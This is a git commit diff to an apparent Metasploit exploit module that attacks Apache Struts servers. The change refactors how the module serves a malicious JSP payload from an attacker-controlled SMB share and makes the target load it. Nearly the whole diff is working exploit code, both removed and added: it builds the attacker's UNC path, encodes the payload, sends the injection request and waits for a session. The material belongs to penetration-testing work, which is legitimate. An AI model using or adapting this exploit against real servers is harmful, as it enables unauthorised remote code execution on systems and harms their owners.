Modify SMB generation code to use primer based on rapid7#3074 changes to

Matthew Hall · Matthew Hall · commit 1751921ede54 · 2015-02-20T11:01:38.000Z
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
diff --git a/modules/exploits/windows/http/struts_http_jspinject.rb b/modules/exploits/windows/http/struts_http_jspinject.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::Remote::SMB::Server::Share
 
   def initialize(info={})
     super(update_info(info,
@@ -50,12 +50,11 @@ def initialize(info={})
       ))
       register_options(
         [
-          OptString.new('UNCPATH',  [false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share)' ]),
-          OptString.new('URI',      [true,  'Path to vulnerable Struts action file', '/struts2-blank/example/HelloWorld.action', true ]),
-          OptString.new('SHARE',    [false, 'A static share path (ie. "share")']),
-          OptString.new('JSP',      [false, 'A static JSP name (ie. "/example/HelloWorld.jsp")']),
+          OptString.new('URI',      [true,  'Path to vulnerable Struts action file', '/struts2-showcase/showcase.action', true ]),
+          OptString.new('FILE_NAME', [ true, 'A static JSP name (ie. "/example/HelloWorld.jsp")', 'showcase.jsp']),
           Opt::RPORT(8080)
         ], self.class)
+      deregister_options('FILE_CONTENTS')
   end
 
   def check
@@ -69,39 +68,10 @@ def check
     end
   end
 
-  def start_server 
-    if (datastore['UNCPATH'])
-      @unc = datastore['UNCPATH']
-      print_status("Remember to share the malicious JSP payload as #{@unc}")
-    else
-      print_status("Generating our malicious jsp...")
-      jsp = payload.encoded 
-
-      # Check if URI and JSP differ
-      if not datastore['JSP']
-        @jsp_file = datastore['URI'].split('/').last(2).join('/').gsub(/action/, 'jsp')
-      else
-        @jsp_file = datastore['JSP']
-      end
-      @jsp_file = @jsp_file.gsub(/\\/, '/')
-      @jsp_file = @jsp_file.gsub(/\/\/\/\//, '/')
-
-      if not datastore['SHARE']
-        @share = rand_text_alpha(5)
-      else
-        @share = datastore['SHARE']
-      end
-
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-      @unc = "\\\\#{my_host}\\#{@share}"
-      vprint_status("About to start SMB Server on: " + @unc + " for " + @jsp_file)
-      start_smb_server(@unc, jsp, @jsp_file)
-    end
-  end
-
-  def exploit
-    start_server
-    share = "#{@unc}"
+  def primer 
+    self.exe_contents = payload.encoded 
+    print_status("File available on #{unc}...")
+    share = "#{unc}"
     sploit = datastore['URI'] 
     share = share.gsub(/\\/, '/')
     #sploit << '?class.classLoader.resources.dirContext.docBase='
@@ -116,11 +86,11 @@ def exploit
       'uri' => sploit
     }, 30)
 
-    if res and res.code == 200 
-      print_status("#{peer} - JSP payload uploaded successfully")
-      handler
-    else
-      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
+    # Wait 30 seconds for session to be created
+    1.upto(30) do
+      break if session_created?
+      sleep(1)
     end
+    disconnect
   end
 end
